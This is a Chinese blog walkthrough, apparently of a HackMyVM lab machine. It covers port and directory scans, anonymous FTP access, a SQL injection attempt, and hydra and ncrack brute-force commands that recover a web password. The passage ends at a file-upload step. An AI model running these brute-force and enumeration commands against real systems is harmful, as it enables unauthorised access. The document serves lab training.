{"id":530,"date":"2024-04-11T19:30:53","date_gmt":"2024-04-11T11:30:53","guid":{"rendered":"http:\/\/162.14.82.114\/?p=530"},"modified":"2024-04-11T19:30:53","modified_gmt":"2024-04-11T11:30:53","slug":"hmv-_-immortal","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/530\/04\/11\/2024\/","title":{"rendered":"hmv[-_-]immortal"},"content":{"rendered":"<h1>immortal<\/h1>\n<p>\u4eca\u5929\u65b0\u4e0a\u7684\u673a\u5b50\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930838.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930838.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411155949676\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>28\u5e08\u5085\u592a\u5f3a\u8fa3\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930839.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930839.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411160300486\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.7 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 172.20.10.7:21\nOpen 172.20.10.7:22\nOpen 172.20.10.7:80\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rw-r--r--    1 0        0             504 Feb 27 22:03 message.txt\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:172.20.10.8\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 4\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)\n| ssh-hostkey: \n|   3072 e8:79:ad:8b:d1:a8:39:1b:ac:ed:52:ef:d0:22:0e:eb (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8kDap5ZB35L8e95K3UxQLM+Do39cnr7giL7TSRx0aWFlG1UdP1kNqaAaT64rPZb9UTfXLePDegaRKvVZ4COOZwIoHjWNxUyD6J3fDhvv+SyMnSP5fByIZSP9DYKEAoUEIXGg\/Dr+xXFmGlqs7knDepO\/RuoLdOJ2fIwYagz\/j4gMPr2z404dskyFiAEEUZg2P66areo80YI7\/8SNZHE\/XQhW8Sf52y6hkyYDYJHJRkfFtdYxuu63lHYFKeQTVxxba14mndnxqYOFJ9GsUujkrXYXwcfTJ7sw7zIrJ8z0ghRM6YjecWHKMc4TgShkiKTh8yXvX0C9qmjYzETsDjEXIoiie7dZD1MKOWH2C6oPsWzSc5YTuu8XNvdsK6+xRiqYgqEw7eGQYssAXOuxMg6tTYto9aVQL+8q8RjdDlHb64TJnxcMVAWZ7bwEXw8SEaXnvMOjeJ\/eW6fT46rA\/A2xCuCxILKGWCGGtfvux\/DHgCr1t8oryPHiQtnhvHpXcGrM=\n|   256 65:df:6d:1d:49:11:bd:f3:2f:fa:10:0c:3b:48:69:39 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMbqCj6qsUHotYSAdbUv67n4up5aUQ1HN4KDcEqti9\/SRmNN3BBm0uoRsSHCWI\/VCgvVo10i6ad5L81hGHgbQ7M=\n|   256 f6:b7:bf:cf:a5:d5:1b:26:4e:13:08:31:07:d5:79:b1 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHEUXs5XAm166vEa3NuQ+R2B4rj3CSbf3mOGRPx+gJB7\n80\/tcp open  http    syn-ack Apache httpd 2.4.56 ((Debian))\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.56 (Debian)\n|_http-title: Password\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code>gobuster<\/code><\/pre>\n<pre><code class=\"language-text\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.7\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,png,php,zip,git,jpg\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 1837]\n\/.php                 (Status: 403) [Size: 276]\n\/.php                 (Status: 403) [Size: 276]\n\/server-status        (Status: 403) [Size: 276]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<pre><code class=\"language-bash\">dirsearch -u http:\/\/172.20.10.7<\/code><\/pre>\n<pre><code class=\"language-text\">  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\nOutput File: \/home\/kali\/temp\/immortal\/reports\/http_172.20.10.7\/_24-04-11_04-10-33.txt\nTarget: http:\/\/172.20.10.7\/\n[04:10:33] Starting: \n[04:10:34] 403 -  276B  - \/.ht_wsr.txt\n[04:10:34] 403 -  276B  - \/.htaccess.bak1\n[04:10:34] 403 -  276B  - \/.htaccessBAK\n[04:10:34] 403 -  276B  - \/.htaccess.sample\n[04:10:34] 403 -  276B  - \/.htaccess.save\n[04:10:34] 403 -  276B  - \/.htaccess_sc\n[04:10:34] 403 -  276B  - \/.htaccess.orig\n[04:10:34] 403 -  276B  - \/.htaccess_orig\n[04:10:34] 403 -  276B  - \/.htaccess_extra\n[04:10:34] 403 -  276B  - \/.htaccessOLD2\n[04:10:34] 403 -  276B  - \/.htm\n[04:10:34] 403 -  276B  - \/.html\n[04:10:34] 403 -  276B  - \/.htaccessOLD\n[04:10:34] 403 -  276B  - \/.htpasswds\n[04:10:34] 403 -  276B  - \/.htpasswd_test\n[04:10:34] 403 -  276B  - \/.httr-oauth\n[04:10:35] 403 -  276B  - \/.php\n[04:11:05] 403 -  276B  - \/server-status\/\n[04:11:05] 403 -  276B  - \/server-status\n\nTask Completed<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash&#039;\">nikto -h http:\/\/172.20.10.7<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.7\n+ Target Hostname:    172.20.10.7\n+ Target Port:        80\n+ Start Time:         2024-04-11 04:06:09 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.56 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time:           2024-04-11 04:06:22 (GMT-4) (13 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930841.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930841.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411160643170\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u654f\u611f\u7aef\u53e3<\/h3>\n<p>\u5c1d\u8bd5ftp\u767b\u5f55\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/immortal]\n\u2514\u2500$ ftp 172.20.10.7\nConnected to 172.20.10.7.\n220 (vsFTPd 3.0.3)\nName (172.20.10.7:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||6209|)\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        115          4096 Feb 27 22:03 .\ndrwxr-xr-x    2 0        115          4096 Feb 27 22:03 ..\n-rw-r--r--    1 0        0             504 Feb 27 22:03 message.txt\n226 Directory send OK.\nftp&gt; get message.txt\nlocal: message.txt remote: message.txt\n229 Entering Extended Passive Mode (|||53897|)\n150 Opening BINARY mode data connection for message.txt (504 bytes).\n100% |***********************************************************************************************************|   504       22.84 KiB\/s    00:00 ETA\n226 Transfer complete.\n504 bytes received in 00:00 (22.51 KiB\/s)\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/immortal]\n\u2514\u2500$ cat message.txt      \nHey guys!\nI made it, after all this time. That&#039;s right guys, the great precious immortality. The one coveted by all and achieved by none. Favoured by all and owned by none. \nNow we have to be careful guys, we have to hide this from the world, from governments and other dangerous institutions. \nThey may even have already heard about our achievement, they are everywhere! That&#039;s why I have decided to strengthen the security of the server. What if they try to hack us!!! \nWishing you a long life, David.<\/code><\/pre>\n<p>\u5f97\u5230\u7528\u6237<code>David<\/code>\u3002<\/p>\n<h3>sql\u6ce8\u5165<\/h3>\n<pre><code class=\"language-bash\">POST \/ HTTP\/1.1\nHost: 172.20.10.7\nContent-Length: 17\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/172.20.10.7\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/172.20.10.7\/\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\npassword=password<\/code><\/pre>\n<p>\u5c1d\u8bd5sql\u6ce8\u5165\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930842.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930842.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411161302122\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u4e0d\u884c\u4e86\uff0c\u5c1d\u8bd5\u5176\u4ed6\u65b9\u6cd5\u3002<\/p>\n<p>\u62ff\u5927\u5b57\u5178\u5728\u540e\u9762\u770b\u770b\u76ee\u5f55\u662f\u4e0d\u662f\u6709\u9057\u6f0f\uff1a<\/p>\n<pre><code class=\"language-text\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/immortal]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.7 -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt -x zip,txt                 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.7\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              zip,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/server-status        (Status: 403) [Size: 276]\nProgress: 3821499 \/ 3821502 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>\u8fd9\u4e2a\u8dd1\u4e86\u5f88\u957f\u65f6\u95f4\uff0c\u5343\u4e07\u522b\u7b49\uff0c\u63a5\u7740\u505a\uff01\u53cd\u6b63\u4e5f\u6ca1\u5565\u6536\u83b7\u3002<\/p>\n<h3>\u5c1d\u8bd5\u7206\u7834<\/h3>\n<pre><code class=\"language-bash\">hydra -l David -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/172.20.10.7<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930843.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930843.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411165223704\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u7528\u7206\u7834\u4e86\uff0c\u611f\u89c9\u6ca1\u4e86\u3002<\/p>\n<p>\u521a\u521a\u7206\u7834\u7684\u65f6\u5019\u8fd8\u8ba9AI\u628a\u521a\u521a\u627e\u5230\u7684ftp\u91cc\u7684\u6587\u4ef6\u8fdb\u884c\u63d0\u8bcd\uff0c\u4fdd\u7559\u611f\u53f9\u53f7\u4ee5\u53ca\u53e5\u53f7\uff0c\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/immortal]\n\u2514\u2500$ ncrack -T5 -v -u David -P pass.txt ssh:\/\/172.20.10.7\nStarting Ncrack 0.7 ( http:\/\/ncrack.org ) at 2024-04-11 04:49 EDT\nssh:\/\/172.20.10.7:22 finished.\nNcrack done: 1 service scanned in 30.06 seconds.\nProbes sent: 51 | timed-out: 0 | prematurely-closed: 19\nNcrack finished.<\/code><\/pre>\n<p>\u6ca1\u6709\u6536\u83b7\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u90a3\u4e2a\u62a5\u9519\uff1f<\/p>\n<pre><code class=\"language-apl\">Incorrect credentials<\/code><\/pre>\n<p>\u5c1d\u8bd5\u89c4\u5b9a\u7528\u6237\u540d<code>David<\/code>\u793e\u5de5\u7206\u7834\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/immortal]\n\u2514\u2500$ ncrack -T5 -v -u David -P pass.txt ssh:\/\/172.20.10.7\nStarting Ncrack 0.7 ( http:\/\/ncrack.org ) at 2024-04-11 04:54 EDT\nssh:\/\/172.20.10.7:22 finished.\nNcrack done: 1 service scanned in 33.06 seconds.\nProbes sent: 51 | timed-out: 0 | prematurely-closed: 14\nNcrack finished.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/immortal]\n\u2514\u2500$ ncrack -T5 -v -u david -P pass.txt ssh:\/\/172.20.10.7\nStarting Ncrack 0.7 ( http:\/\/ncrack.org ) at 2024-04-11 04:55 EDT\nssh:\/\/172.20.10.7:22 finished.\nNcrack done: 1 service scanned in 30.05 seconds.\nProbes sent: 51 | timed-out: 0 | prematurely-closed: 17\nNcrack finished.<\/code><\/pre>\n<p>\u540e\u9762\u7ecf\u8fc7\u6307\u70b9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930844.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930844.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411170115641\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">hydra -l david -P \/usr\/share\/wordlists\/rockyou.txt 172.20.10.7 http-post-form &quot;\/:password=^PASS^:Incorrect&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930845.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930845.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411170223354\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">santiago<\/code><\/pre>\n<p>\u989d\uff0c\u5b66\u5230\u4e86\uff0c\u539f\u6765\u4e0d\u662f\u7206\u7834ssh\uff0c\u54c8\u54c8\u54c8\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930846.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930846.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411170341508\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">\/\/ message1\nI am very happy that you have included me in the project \nfor the quest for immortality. I am sure we will succeed, whatever it takes. \nBest regards, Drake\n\n\/\/ message2\nMessage to Eric.\nRemember to buy mice for the experiments, there are very few left. Also remember to tell Boyras to give us the money he owes us, or else we&#039;ll have to beat it out of him ourselves.\nRegards, David.\n\n\/\/ message3\nMessage to all.\nI&#039;m glad you made it, I knew you would guess the password, it&#039;s the one we always used, although Boyras recommended us to stop using it because &quot;it was in rockyou&quot;. \nBy the way guys, you can still upload messages to the server from this new path -&gt; upload_an_incredible_message.php\nSaying goodbye very happy, David\n\n\/\/ important\nNothing important\n-. --- - .... .. -. --.\n.. -- .--. --- .-. - .- -. -\n\n\/\/ test30\nTest 30 : passed\nI can&#039;t believe it! It&#039;s unbelievable! It&#039;s amazing!\nBut...\nMen die\nWoman die\nDogs die\nIs it worth living forever, if you will live alone?<\/code><\/pre>\n<p>\u53d1\u73b0\u4e00\u5904\u6587\u4ef6\u4e0a\u4f20\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930847.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930847.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411170749231\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4ee5\u53ca\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930848.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930848.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411170821965\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4e0a\u4f20\u6587\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930849.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930849.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411171025776\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7b11\u6b7b\u4e86\uff0c\u5c1d\u8bd5\u6293\u5305\u6539\u5305\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930850.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930850.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411172336100\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111930851.png'><img class=\"lazyload lazyload-style-2\" 